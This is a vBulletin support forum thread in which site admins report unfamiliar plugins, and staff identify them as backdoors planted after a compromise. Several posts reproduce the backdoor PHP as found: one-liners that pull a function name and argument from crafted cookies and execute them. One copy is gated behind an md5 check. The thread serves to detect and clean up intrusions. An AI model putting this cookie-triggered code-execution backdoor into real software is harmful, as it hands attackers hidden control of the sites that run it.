Announcement

Collapse
No announcement yet.

Is This a Default Plugin?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • prefix_vb4_cmsanswered_title_rich Is This a Default Plugin?

    vbCMS Global Thread Cache

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    Wondering if this is related to the vbseo security update. I noticed this plugin after upgrading to 4.1.10 but Brian at vbseo says it looks suspicious.
    sigpic
    Nation of Blue - Kentucky Wildcats Sports


    Some CMS Goodness: Add Avatar to Article

  • #2
    I'm interested to know as well so it's something I can check on client sites.
    -- Web Developer for hire
    ---Online Marketing Tools and Articles

    Comment


    • #3
      Further discussion at vbseo says it is not a part of the default package and should be removed.
      sigpic
      Nation of Blue - Kentucky Wildcats Sports


      Some CMS Goodness: Add Avatar to Article

      Comment


      • #4
        Originally posted by reefland View Post
        Further discussion at vbseo says it is not a part of the default package and should be removed.
        I saw that, I did some google searching and the only info I found was it listed on Arabic sites.
        -- Web Developer for hire
        ---Online Marketing Tools and Articles

        Comment


        • #5
          It should be removed. One thing I've noticed lately is once someone gets into a site, via whatever means, they are more likely to install a backdoor. This looks to be such an occurrence.

          However, vbulletin_collapse is a valid cookie. Usually looks like this: vbulletin_collapse=c_cat134 c_cat115. Tells the system what areas you have collapsed. Since the collapsing is done by CSS and javascript, there is no real need to have this value in PHP or cached in PHP. Most likely they are creating fake cookies and executing code via the $m variable.

          And my previously published checks for compromises will not check for this plugin via Query. I'll update the protocols.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment


          • #6
            Thanks for confirming Wayne Luke
            -- Web Developer for hire
            ---Online Marketing Tools and Articles

            Comment


            • #7
              Time to watch the admin log...
              sigpic
              Nation of Blue - Kentucky Wildcats Sports


              Some CMS Goodness: Add Avatar to Article

              Comment


              • #8
                Is there any way we can see how this plugin was added?

                Comment


                • #9
                  Since it seems people have reported over on vBSEO that it's come back even after fixing that hole....if this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?

                  Originally posted by reefland View Post
                  Time to watch the admin log...
                  The plugin was added on my forums, however when I checked the admin log on plugin.php for the past month or so, I didn't see anything in there I didn't do myself. Not sure it's going to show.
                  Last edited by Archaic; Mon 23 Jan '12, 12:30pm.
                  神出鬼没 - shin shutsu ki botsu

                  Webmaster, Bulbagarden / Bulbapedia

                  Comment


                  • #10
                    Originally posted by Talaturen View Post
                    Is there any way we can see how this plugin was added?
                    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment


                    • #11
                      I found a plugin called "vBulletin Templates Cookie Caching":
                      PHP Code:
                      /* vBulletin Templates Cookie Caching */
                      $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
                      Macht mit beim 2-Wheel-Planet Adventskalender:

                      2WP Adventskalender

                      Comment


                      • #12
                        Originally posted by Archaic View Post
                        If this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?
                        A conclusion like that would only be supported with proof of some sort. Looks like your vBulletin is up to date. Looks like you stayed up to date with patches. Your Admin CP isn't behind .htaccess though.

                        Are all your addons up to date?

                        Do you have anything stored in the searchprefs field of the usertextfield table?
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment


                        • #13
                          I found something in the admin log:
                          54131 admin 20:04, 20.01.2012 plugin.php
                          54130 admin 20:04, 20.01.2012 plugin.php update
                          54129 admin 20:04, 20.01.2012 plugin.php add
                          54128 admin 20:04, 20.01.2012 plugin.php
                          The incredible thing is that I really was active in the admincp minutes later... 20:05 I did some template changes...
                          Macht mit beim 2-Wheel-Planet Adventskalender:

                          2WP Adventskalender

                          Comment


                          • #14
                            Originally posted by MK_1 View Post
                            I found a plugin called "vBulletin Templates Cookie Caching":
                            PHP Code:
                            /* vBulletin Templates Cookie Caching */
                            $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 

                            Same as the plugin above but different cookie values.
                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API

                            Comment


                            • #15
                              This "vbCMS Global Thread Cache" has appeared on my site as well.

                              Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
                              Fantasy Writing Forum - Mythic Scribes

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X